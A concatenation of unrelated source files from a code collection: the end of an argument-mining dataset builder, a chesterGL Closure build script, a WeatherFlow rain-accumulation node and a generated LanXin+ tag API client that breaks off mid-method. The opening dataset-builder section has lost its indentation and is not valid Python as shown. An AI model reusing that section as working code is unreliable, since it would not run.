create_total_dataframe(pickles_path)
print('____________________________________________________________________________________________')
print("-------------------------------------------------------------")
print("DATASETS DETAILS")
print("-------------------------------------------------------------")
pickles_path = os.path.join(dataset_path, "pickles", dataset_version)
print("DATASET VERSION: " + "all")
print()
for split in splits:
print('_______________________')
print(split)
dataframe_path = os.path.join(pickles_path, split + '.pkl')
if os.path.exists(dataframe_path):
print_dataframe_details(dataframe_path)
print('_______________________')
sys.stdout.flush()
print('_______________________')
print('_______________________')
print('_____________________________________________________________________')
pickles_path = os.path.join(dataset_path, "pickles", dataset_version)
print("DATASET VERSION: " + dataset_version)
print()
for split in splits:
print('_______________________')
print(split)
dataframe_path = os.path.join(pickles_path, split + '.pkl')
if os.path.exists(dataframe_path):
print_dataframe_details(dataframe_path)
print('_______________________')
sys.stdout.flush()
print('_______________________')
print('_______________________')
print('_____________________________________________________________________')
print("-------------------------------------------------------------")
print("DISTANCE ANALYSIS")
print("-------------------------------------------------------------")
pickles_path = os.path.join(dataset_path, "pickles")
print_distance_analysis(pickles_path)
# distance analysis
pickles_path = os.path.join(dataset_path, "pickles", dataset_version)
print_distance_analysis(pickles_path)
highest = 0
lowest = 0
def routine_ECHR_corpus():
a_link_types = ['Support', 'Attack']
s_link_types = []
s_non_link_types = ['Duplicate']
a_non_link_types = ['Citation']
dataset_name = 'ECHR2018'
maxdistance = 0
dataset_version = 'arg' + str(maxdistance)
splits = ['total', 'train', 'test', 'validation']
dataset_path = os.path.join(os.getcwd(), 'Datasets', dataset_name)
document_path = os.path.join(os.getcwd(), 'Datasets', dataset_name, "original_data")
print("-------------------------------------------------------------")
print("DATASETS CREATION")
print("-------------------------------------------------------------")
create_ECHR_pickle(dataset_path, dataset_version, document_path,
a_link_types, s_link_types, a_non_link_types, s_non_link_types,
maxdistance=maxdistance, reflexive=False)
print('____________________________________________________________________________________________')
pickles_path = os.path.join(dataset_path, "pickles", dataset_version)
sys.stdout.flush()
create_total_dataframe(pickles_path)
print('____________________________________________________________________________________________')
print("-------------------------------------------------------------")
print("DATASETS DETAILS")
print("-------------------------------------------------------------")
pickles_path = os.path.join(dataset_path, "pickles", dataset_version)
print("DATASET VERSION: " + "all")
print()
for split in splits:
print('_______________________')
print(split)
dataframe_path = os.path.join(pickles_path, split + '.pkl')
if os.path.exists(dataframe_path):
print_dataframe_details(dataframe_path)
print('_______________________')
sys.stdout.flush()
print('_______________________')
print('_______________________')
print('_____________________________________________________________________')
pickles_path = os.path.join(dataset_path, "pickles", dataset_version)
print("DATASET VERSION: " + dataset_version)
print()
for split in splits:
print('_______________________')
print(split)
dataframe_path = os.path.join(pickles_path, split + '.pkl')
if os.path.exists(dataframe_path):
print_dataframe_details(dataframe_path)
print('_______________________')
sys.stdout.flush()
print('_______________________')
print('_______________________')
print('_____________________________________________________________________')
print("-------------------------------------------------------------")
print("DISTANCE ANALYSIS")
print("-------------------------------------------------------------")
pickles_path = os.path.join(dataset_path, "pickles")
print_distance_analysis(pickles_path)
# distance analysis
pickles_path = os.path.join(dataset_path, "pickles", dataset_version)
print_distance_analysis(pickles_path)
highest = 0
lowest = 0
# this has been changed and not yet tested:
def routine_CDCP_corpus():
# CDCP CORPUS
link_types = ['evidences', 'reasons']
dataset_name = 'cdcp_ACL17'
dataset_version = 'new_3'
dataset_type = 'train'
dataset_path = os.path.join(os.getcwd(), 'Datasets', dataset_name)
create_function = create_preprocessed_cdcp_pickle
create_function(dataset_path, dataset_version, link_types, dataset_type, validation=0.1, reflexive=False)
dataset_type = 'test'
create_function(dataset_path, dataset_version, link_types, dataset_type, reflexive=False)
pickles_path = os.path.join(dataset_path, 'pickles', dataset_version)
create_total_dataframe(pickles_path)
for split in ('train', 'test', 'validation', 'total'):
print(split)
dataframe_path = os.path.join(dataset_path, 'pickles', dataset_version, split + '.pkl')
print_dataframe_details(dataframe_path)
print('_______________________')
print('_______________________')
def routine_UKP_corpus():
link_types = ['supports', 'attacks']
dataset_name = 'AAEC_v2'
dataset_version = 'new_2R'
dataset_type = 'train'
dataset_path = os.path.join(os.getcwd(), 'Datasets', dataset_name)
# Use of reflexive creates 8k additional pairs of no-link :(
# Avoidance of reflexive misses 400 major claims :(
create_ukp_pickle(dataset_path, dataset_version, link_types, dataset_type, validation=0.1, reflexive=True)
dataset_type = 'test'
create_ukp_pickle(dataset_path, dataset_version, link_types, dataset_type, validation=0, reflexive=True)
pickles_path = os.path.join(dataset_path, 'pickles', dataset_version)
create_total_dataframe(pickles_path)
for split in ('train', 'test', 'validation', 'total'):
print(split)
dataframe_path = os.path.join(dataset_path, 'pickles', dataset_version, split + '.pkl')
print_dataframe_details(dataframe_path)
print('_______________________')
print('_______________________')
def routine_scidtb_corpus():
link_types = ["support", "attack"]
asymmetric_non_link_types = []
# asymmetric_non_link_types = ["detail", "additional", "sequence"]
dataset_name = "scidtb_argmin_annotations"
dataset_version = "only_arg_v1"
dataset_path = os.path.join(os.getcwd(), 'Datasets', dataset_name)
document_path = os.path.join(os.getcwd(), 'Datasets', dataset_name, "original_data")
pickles_path = os.path.join(dataset_path, 'pickles', dataset_version)
create_scidtb_pickle(dataset_path, dataset_version, document_path, link_types, [], asymmetric_non_link_types, [],
test=0.2, validation=0.2, reflexive=False)
create_total_dataframe(pickles_path)
for split in ('train', 'test', 'validation', 'total'):
print(split)
dataframe_path = os.path.join(dataset_path, 'pickles', dataset_version, split + '.pkl')
print_dataframe_details(dataframe_path)
print('_______________________')
print('_______________________')
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="Create a new dataframe")
parser.add_argument('-c', '--corpus',
choices=["rct", "drinv", "cdcp", "echr", "ukp", "scidtb"],
help="Corpus", default="cdcp")
parser.add_argument('-d', '--distance',
help="The maximum distance considered to create pairs. Used only for some corpora.", default=10)
args = parser.parse_args()
corpus = args.corpus
distance = args.distance
if corpus.lower() == "rct":
routine_RCT_corpus()
elif corpus.lower() == "cdcp":
routine_CDCP_corpus()
elif corpus.lower() == "drinv":
routine_DrInventor_corpus(distance)
elif corpus.lower() == "ukp":
routine_UKP_corpus()
elif corpus.lower() == "scidtb":
routine_scidtb_corpus()
else:
print("Datset not yet supported")
| 3.140625 | 3 |
benchmarks/src/garage_benchmarks/experiments/q_functions/__init__.py | blacksph3re/garage | 1,500 | 12765054 | <reponame>blacksph3re/garage
"""Benchmarking experiments for Q-functions."""
from garage_benchmarks.experiments.q_functions.continuous_mlp_q_function import ( # isort:skip # noqa: E501
continuous_mlp_q_function)
__all__ = ['continuous_mlp_q_function']
| 1.015625 | 1 |
compile.py | rolandoam/ChesterGL | 1 | 12765055 | # compile.py
# - Version: 1.0
# - Replacement for the Makefile. This is cross-platform.
# - Requires Python 2.7+
import sys, argparse, subprocess, urllib2
externs = ['jquery-1.7.js', 'webkit_console.js', 'google_analytics_api.js', 'json.js']
src = ['chesterGL/core.js', 'chesterGL/block.js', 'chesterGL/blockFrames.js', 'chesterGL/blockGroup.js', 'chesterGL/actions.js', 'chesterGL/tmxBlock.js', 'chesterGL/GPUParticleSystem.js', 'chesterGL/primitivesBlock.js', 'chesterGL/labelBlock.js', 'chesterGL/bmFontLabelBlock.js']
parser = argparse.ArgumentParser(description='Compiler for ChesterGL')
group1 = parser.add_argument_group('Compile Options')
group1.add_argument('-mode', action='store', choices=['debug', 'release'], default='release', help='Set the flags for debug or release.')
group1.add_argument('-fetch', '-f', action='store_true', default=True, help='Fetch externs.')
group1.add_argument('-docs', action='store_true', help='Build documents using JSDoc.')
group1.add_argument('-output', '-o', action='store', default='./html', help='Output directory.')
group2 = parser.add_argument_group('Dependency Options')
group2.add_argument('-python', action='store', default='python', help='Location of python executable.')
group2.add_argument('-java', action='store', default='java', help='Location of java.')
group2.add_argument('-jsdoc', action='store', default='/Applications/jsdoc-toolkit', help='Location of JSDoc root directory.')
group2.add_argument('-ccompiler', action='store', default='/Applications/closure-compiler', help='Path to closure compiler folder.')
group2.add_argument('-clib', action='store', default='/Applications/closure-library', help='Path to closure library folder.')
group2.add_argument('-cjar', action='store', default='compiler.jar', help='Filename to closure compiler jar.')
args = parser.parse_args()
externsTmp = ''
for ext in externs:
externsTmp += '--externs ' + args.ccompiler +'/' + ext + ' '
compilerArgs = externsTmp + '--language_in=ECMASCRIPT5_STRICT --warning_level=VERBOSE --jscomp_warning=checkTypes --summary_detail_level=3 '
def dload(file, output):
response = urllib2.urlopen(file)
html = response.read()
o = open(output, 'w+')
o.write(html)
o.close()
return
# Fetch externs?
if args.fetch:
for file in externs:
dload('http://closure-compiler.googlecode.com/svn/trunk/contrib/externs/' + file, args.ccompiler + '/' + file)
print 'Downloaded: ' + file
# Write the flag files for compiling
flags = ''
flagFile = open(args.mode + '.flags', 'w+')
if args.mode == 'release': # Release flags
flags += compilerArgs
flags += '--externs deps.js '
flags += '--compilation_level ADVANCED_OPTIMIZATIONS '
flags += '--create_source_map=' + args.output +'/chester.js.map '
else: # Debug flags
flags += compilerArgs
flags += '--externs deps.js '
flags += '--compilation_level ADVANCED_OPTIMIZATIONS '
flags += '--formatting PRETTY_PRINT '
flags += '-D ENABLE_DEBUG=1 '
flags += '--create_source_map=' + args.output +'/chester.js.map '
flags += '--source_map_format=V3'
flagFile.write(flags)
flagFile.close()
# Compile
compileArgs = args.python + ' '
compileArgs += args.clib + '/closure/bin/build/closurebuilder.py '
compileArgs += '--root ' + args.clib + ' '
compileArgs += '--output_mode=compiled '
compileArgs += '--output_file=' + args.output + '/chester.js '
compileArgs += '--compiler_jar=' + args.ccompiler + '/' + args.cjar + ' '
compileArgs += '--root=chesterGL/ '
if args.mode == 'release':
compileArgs += '--compiler_flags="--flagfile=release.flags" '
else:
compileArgs += '--compiler_flags="--flagfile=debug.flags" '
for file in src:
compileArgs += '-i ' + file + ' '
if subprocess.call(compileArgs, shell=True) != 0:
print '================================'
print 'We had an error during the compile process.'
sys.exit()
# If debug, add source mapping comment to compiled file.
if args.mode == 'debug':
jsFile = open(args.output + '/chester.js', 'a+')
jsFile.write('//@ sourceMappingURL=chester.js.map');
jsFile.close()
# Generate doc?
if args.docs:
docs = args.java + ' '
docs += '-jar ' + args.jsdoc + '/jsrun.jar ' + args.jsdoc + '/app/run.js -w -version 170 -v -a '
docs += '-t=' + args.jsdoc + '/templates/jsdoc '
src.insert(0, 'chesterGL/docs.js')
for file in src:
docs += file + ' '
docs += '-d=' + args.output + '/docs'
if subprocess.call(docs, shell=True) != 0:
print '================================'
print 'We had an error during the compile process.'
sys.exit()
print '================================'
print 'Completed.' | 2.015625 | 2 |
nodes/rain.py | JavierRefuerzo/WeatherFlow | 4 | 12765056 | #!/usr/bin/env python3
"""
Polyglot v2 node server for WeatherFlow Weather Station data.
Copyright (c) 2018,2019 <NAME>
"""
import polyinterface
import sys
import time
import datetime
import urllib3
import json
import socket
import math
import threading
LOGGER = polyinterface.LOGGER
class PrecipitationNode(polyinterface.Node):
id = 'precipitation'
hint = [1,11,5,0]
units = 'metric'
drivers = [
{'driver': 'ST', 'value': 0, 'uom': 46}, # rate
{'driver': 'GV0', 'value': 0, 'uom': 82}, # hourly
{'driver': 'GV1', 'value': 0, 'uom': 82}, # daily
{'driver': 'GV2', 'value': 0, 'uom': 82}, # weekly
{'driver': 'GV3', 'value': 0, 'uom': 82}, # monthly
{'driver': 'GV4', 'value': 0, 'uom': 82}, # yearly
{'driver': 'GV5', 'value': 0, 'uom': 82} # yesterday
]
hourly_rain = 0
daily_rain = 0
weekly_rain = 0
monthly_rain = 0
yearly_rain = 0
yesterday_rain = 0
prev_hour = 0
prev_day = 0
prev_week = 0
prev_month = 0
prev_year = 0
def InitializeRain(self, acc):
self.daily_rain = acc['daily']
self.hourly_rain = acc['hourly']
self.weekly_rain = acc['weekly']
self.monthly_rain = acc['monthly']
self.yearly_rain = acc['yearly']
self.yesterday_rain = acc['yesterday']
self.prev_hour = acc['hour']
self.prev_day = acc['day']
self.prev_week = acc['week']
self.prev_month = acc['month']
self.prev_year = acc['year']
now = datetime.datetime.now()
# Need to compare saved date with current date and clear out
# any accumlations that are old.
current_hour = now.hour
if self.prev_hour != now.hour:
LOGGER.info('Clearing old hourly data')
self.prev_hour = now.hour
self.hourly_rain = 0
if self.prev_day != now.day:
LOGGER.info('Clearing old daily, hourly data')
self.yesterday_rain = self.daily_rain
self.prev_day = now.day
self.hourly_rain = 0
self.daily_rain = 0
if self.prev_week != now.isocalendar()[1]:
LOGGER.info('Clearing old weekly, daily, hourly data')
self.prev_week = now.isocalendar()[1]
self.hourly_rain = 0
self.daily_rain = 0
self.weekly_rain = 0
if self.prev_month != now.month:
LOGGER.info('Clearing old monthly, daily, hourly data')
self.prev_month = now.month
self.hourly_rain = 0
self.daily_rain = 0
self.weekly_rain = 0
self.monthly_rain = 0
if self.prev_year != now.year:
LOGGER.info('Clearing old yearly, monthly, daily, hourly data')
self.prev_year = now.year
self.hourly_rain = 0
self.daily_rain = 0
self.weekly_rain = 0
self.monthly_rain = 0
self.yearly_rain = 0
def SetUnits(self, u):
self.units = u
if (u == 'mm'):
self.drivers[0]['uom'] = 46
self.drivers[1]['uom'] = 82
self.drivers[2]['uom'] = 82
self.drivers[3]['uom'] = 82
self.drivers[4]['uom'] = 82
self.drivers[5]['uom'] = 82
self.drivers[6]['uom'] = 82
self.id = 'precipitation'
elif (u == 'in'):
self.drivers[0]['uom'] = 24
self.drivers[1]['uom'] = 105
self.drivers[2]['uom'] = 105
self.drivers[3]['uom'] = 105
self.drivers[4]['uom'] = 105
self.drivers[5]['uom'] = 105
self.drivers[6]['uom'] = 105
self.id = 'precipitationUS'
def hourly_accumulation(self, r):
current_hour = datetime.datetime.now().hour
if (current_hour != self.prev_hour):
self.prev_hour = current_hour
self.hourly_rain = 0
self.hourly_rain += r
return self.hourly_rain
def daily_accumulation(self, r):
current_day = datetime.datetime.now().day
if (current_day != self.prev_day):
self.yesterday_rain = self.daily_rain
self.prev_day = current_day
self.daily_rain = 0
self.daily_rain += r
return self.daily_rain
def yesterday_accumulation(self):
return self.yesterday_rain
def weekly_accumulation(self, r):
(y, w, d) = datetime.datetime.now().isocalendar()
if w != self.prev_week:
self.prev_week = w
self.weekly_rain = 0
self.weekly_rain += r
return self.weekly_rain
def monthly_accumulation(self, r):
current_month = datetime.datetime.now().month
if (current_month != self.prev_month):
self.prev_month = current_month
self.monthly_rain = 0
self.monthly_rain += r
return self.monthly_rain
def yearly_accumulation(self, r):
current_year = datetime.datetime.now().year
if (current_year != self.prev_year):
self.prev_year = current_year
self.yearly_rain = 0
self.yearly_rain += r
return self.yearly_rain
def setDriver(self, driver, value):
if (self.units == 'in'):
value = round(value * 0.03937, 2)
else:
value = round(value, 3)
super(PrecipitationNode, self).setDriver(driver, value, report=True, force=True)
| 2.640625 | 3 |
lanxinplus_openapi/api/addrbk_tags_api.py | lanxinplus/lanxinplus-python-sdk | 0 | 12765057 | <gh_stars>0
"""
LanXin+ OpenAPI
LanXin+ OpenAPI Platform # noqa: E501
Generated by: https://openapi.lanxin.cn
"""
import re # noqa: F401
import sys # noqa: F401
from lanxinplus_openapi.api_client import ApiClient, Endpoint as _Endpoint
from lanxinplus_openapi.model_utils import ( # noqa: F401
check_allowed_values,
check_validations,
date,
datetime,
file_type,
none_type,
validate_and_convert_types
)
from lanxinplus_openapi.model.v1_tag_groups_create_request_body import V1TagGroupsCreateRequestBody
from lanxinplus_openapi.model.v1_tag_groups_create_response import V1TagGroupsCreateResponse
from lanxinplus_openapi.model.v1_tag_groups_delete_response import V1TagGroupsDeleteResponse
from lanxinplus_openapi.model.v1_tag_groups_fetch_request_body import V1TagGroupsFetchRequestBody
from lanxinplus_openapi.model.v1_tag_groups_fetch_response import V1TagGroupsFetchResponse
from lanxinplus_openapi.model.v1_tag_groups_info_fetch_response import V1TagGroupsInfoFetchResponse
from lanxinplus_openapi.model.v1_tag_groups_update_request_body import V1TagGroupsUpdateRequestBody
from lanxinplus_openapi.model.v1_tag_groups_update_response import V1TagGroupsUpdateResponse
from lanxinplus_openapi.model.v1_tags_create_request_body import V1TagsCreateRequestBody
from lanxinplus_openapi.model.v1_tags_create_response import V1TagsCreateResponse
from lanxinplus_openapi.model.v1_tags_delete_response import V1TagsDeleteResponse
from lanxinplus_openapi.model.v1_tags_meta_fetch_request_body import V1TagsMetaFetchRequestBody
from lanxinplus_openapi.model.v1_tags_meta_fetch_response import V1TagsMetaFetchResponse
from lanxinplus_openapi.model.v1_tags_update_request_body import V1TagsUpdateRequestBody
from lanxinplus_openapi.model.v1_tags_update_response import V1TagsUpdateResponse
class AddrbkTagsApi(object):
"""NOTE: This class is auto generated by LanXin+
Ref: https://openapi.lanxin.cn
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
self.v1_tag_groups_create_endpoint = _Endpoint(
settings={
'response_type': (V1TagGroupsCreateResponse,),
'auth': [],
'endpoint_path': '/v1/taggroups/create',
'operation_id': 'v1_tag_groups_create',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'app_token',
'v1_tag_groups_create_request_body',
'user_token',
],
'required': [
'app_token',
'v1_tag_groups_create_request_body',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'app_token':
(str,),
'v1_tag_groups_create_request_body':
(V1TagGroupsCreateRequestBody,),
'user_token':
(str,),
},
'attribute_map': {
'app_token': 'app_token',
'user_token': 'user_token',
},
'location_map': {
'app_token': 'query',
'v1_tag_groups_create_request_body': 'body',
'user_token': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client
)
self.v1_tag_groups_delete_endpoint = _Endpoint(
settings={
'response_type': (V1TagGroupsDeleteResponse,),
'auth': [],
'endpoint_path': '/v1/taggroups/{tag_group_id}/delete',
'operation_id': 'v1_tag_groups_delete',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'app_token',
'tag_group_id',
'user_token',
],
'required': [
'app_token',
'tag_group_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'app_token':
(str,),
'tag_group_id':
(str,),
'user_token':
(str,),
},
'attribute_map': {
'app_token': 'app_token',
'tag_group_id': 'tag_group_id',
'user_token': 'user_token',
},
'location_map': {
'app_token': 'query',
'tag_group_id': 'path',
'user_token': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client
)
self.v1_tag_groups_fetch_endpoint = _Endpoint(
settings={
'response_type': (V1TagGroupsFetchResponse,),
'auth': [],
'endpoint_path': '/v1/taggroups/fetch',
'operation_id': 'v1_tag_groups_fetch',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'app_token',
'v1_tag_groups_fetch_request_body',
'user_token',
],
'required': [
'app_token',
'v1_tag_groups_fetch_request_body',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'app_token':
(str,),
'v1_tag_groups_fetch_request_body':
(V1TagGroupsFetchRequestBody,),
'user_token':
(str,),
},
'attribute_map': {
'app_token': 'app_token',
'user_token': 'user_token',
},
'location_map': {
'app_token': 'query',
'v1_tag_groups_fetch_request_body': 'body',
'user_token': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client
)
self.v1_tag_groups_info_fetch_endpoint = _Endpoint(
settings={
'response_type': (V1TagGroupsInfoFetchResponse,),
'auth': [],
'endpoint_path': '/v1/taggroups/{tag_group_id}/fetch',
'operation_id': 'v1_tag_groups_info_fetch',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'app_token',
'tag_group_id',
'user_token',
],
'required': [
'app_token',
'tag_group_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'app_token':
(str,),
'tag_group_id':
(str,),
'user_token':
(str,),
},
'attribute_map': {
'app_token': 'app_token',
'tag_group_id': 'tag_group_id',
'user_token': 'user_token',
},
'location_map': {
'app_token': 'query',
'tag_group_id': 'path',
'user_token': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client
)
self.v1_tag_groups_update_endpoint = _Endpoint(
settings={
'response_type': (V1TagGroupsUpdateResponse,),
'auth': [],
'endpoint_path': '/v1/taggroups/{tag_group_id}/update',
'operation_id': 'v1_tag_groups_update',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'app_token',
'tag_group_id',
'v1_tag_groups_update_request_body',
'user_token',
],
'required': [
'app_token',
'tag_group_id',
'v1_tag_groups_update_request_body',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'app_token':
(str,),
'tag_group_id':
(str,),
'v1_tag_groups_update_request_body':
(V1TagGroupsUpdateRequestBody,),
'user_token':
(str,),
},
'attribute_map': {
'app_token': 'app_token',
'tag_group_id': 'tag_group_id',
'user_token': 'user_token',
},
'location_map': {
'app_token': 'query',
'tag_group_id': 'path',
'v1_tag_groups_update_request_body': 'body',
'user_token': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client
)
self.v1_tags_create_endpoint = _Endpoint(
settings={
'response_type': (V1TagsCreateResponse,),
'auth': [],
'endpoint_path': '/v1/tags/create',
'operation_id': 'v1_tags_create',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'app_token',
'v1_tags_create_request_body',
'user_token',
],
'required': [
'app_token',
'v1_tags_create_request_body',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'app_token':
(str,),
'v1_tags_create_request_body':
(V1TagsCreateRequestBody,),
'user_token':
(str,),
},
'attribute_map': {
'app_token': 'app_token',
'user_token': 'user_token',
},
'location_map': {
'app_token': 'query',
'v1_tags_create_request_body': 'body',
'user_token': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client
)
self.v1_tags_delete_endpoint = _Endpoint(
settings={
'response_type': (V1TagsDeleteResponse,),
'auth': [],
'endpoint_path': '/v1/tags/{tagid}/delete',
'operation_id': 'v1_tags_delete',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'app_token',
'tagid',
'user_token',
],
'required': [
'app_token',
'tagid',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'app_token':
(str,),
'tagid':
(str,),
'user_token':
(str,),
},
'attribute_map': {
'app_token': 'app_token',
'tagid': 'tagid',
'user_token': 'user_token',
},
'location_map': {
'app_token': 'query',
'tagid': 'path',
'user_token': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client
)
self.v1_tags_meta_fetch_endpoint = _Endpoint(
settings={
'response_type': (V1TagsMetaFetchResponse,),
'auth': [],
'endpoint_path': '/v1/tags/meta/fetch',
'operation_id': 'v1_tags_meta_fetch',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'app_token',
'v1_tags_meta_fetch_request_body',
'user_token',
],
'required': [
'app_token',
'v1_tags_meta_fetch_request_body',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'app_token':
(str,),
'v1_tags_meta_fetch_request_body':
(V1TagsMetaFetchRequestBody,),
'user_token':
(str,),
},
'attribute_map': {
'app_token': 'app_token',
'user_token': 'user_token',
},
'location_map': {
'app_token': 'query',
'v1_tags_meta_fetch_request_body': 'body',
'user_token': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client
)
self.v1_tags_update_endpoint = _Endpoint(
settings={
'response_type': (V1TagsUpdateResponse,),
'auth': [],
'endpoint_path': '/v1/tags/{tagid}/update',
'operation_id': 'v1_tags_update',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'app_token',
'tagid',
'v1_tags_update_request_body',
'user_token',
],
'required': [
'app_token',
'tagid',
'v1_tags_update_request_body',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'app_token':
(str,),
'tagid':
(str,),
'v1_tags_update_request_body':
(V1TagsUpdateRequestBody,),
'user_token':
(str,),
},
'attribute_map': {
'app_token': 'app_token',
'tagid': 'tagid',
'user_token': 'user_token',
},
'location_map': {
'app_token': 'query',
'tagid': 'path',
'v1_tags_update_request_body': 'body',
'user_token': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client
)
def v1_tag_groups_create(
self,
app_token,
v1_tag_groups_create_request_body,
**kwargs
):
"""创建标签分组 # noqa: E501
创建标签分组 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_tag_groups_create(app_token, v1_tag_groups_create_request_body, async_req=True)
>>> result = thread.get()
Args:
app_token (str): app_token
v1_tag_groups_create_request_body (V1TagGroupsCreateRequestBody): Request Body
Keyword Args:
user_token (str): user_token. [optional]
Returns:
V1TagGroupsCreateResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['app_token'] = \
app_token
kwargs['v1_tag_groups_create_request_body'] = \
v1_tag_groups_create_request_body
return self.v1_tag_groups_create_endpoint.call_with_http_info(**kwargs)
def v1_tag_groups_delete(
self,
app_token,
tag_group_id,
**kwargs
):
"""删除标签分组 # noqa: E501
删除标签分组 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_tag_groups_delete(app_token, tag_group_id, async_req=True)
>>> result = thread.get()
Args:
app_token (str): app_token
tag_group_id (str): tag_group_id
Keyword Args:
user_token (str): user_token. [optional]
Returns:
V1TagGroupsDeleteResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['app_token'] = \
app_token
kwargs['tag_group_id'] = \
tag_group_id
return self.v1_tag_groups_delete_endpoint.call_with_http_info(**kwargs)
def v1_tag_groups_fetch(
self,
app_token,
v1_tag_groups_fetch_request_body,
**kwargs
):
"""获取标签分组列表 # noqa: E501
获取标签分组列表 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_tag_groups_fetch(app_token, v1_tag_groups_fetch_request_body, async_req=True)
>>> result = thread.get()
Args:
app_token (str): app_token
v1_tag_groups_fetch_request_body (V1TagGroupsFetchRequestBody): Request Body
Keyword Args:
user_token (str): user_token. [optional]
Returns:
V1TagGroupsFetchResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['app_token'] = \
app_token
kwargs['v1_tag_groups_fetch_request_body'] = \
v1_tag_groups_fetch_request_body
return self.v1_tag_groups_fetch_endpoint.call_with_http_info(**kwargs)
def v1_tag_groups_info_fetch(
self,
app_token,
tag_group_id,
**kwargs
):
"""获取标签分组详情 # noqa: E501
获取标签分组详情 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_tag_groups_info_fetch(app_token, tag_group_id, async_req=True)
>>> result = thread.get()
Args:
app_token (str): app_token
tag_group_id (str): tag_group_id
Keyword Args:
user_token (str): user_token. [optional]
Returns:
V1TagGroupsInfoFetchResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['app_token'] = \
app_token
kwargs['tag_group_id'] = \
tag_group_id
return self.v1_tag_groups_info_fetch_endpoint.call_with_http_info(**kwargs)
def v1_tag_groups_update(
self,
app_token,
tag_group_id,
v1_tag_groups_update_request_body,
**kwargs
):
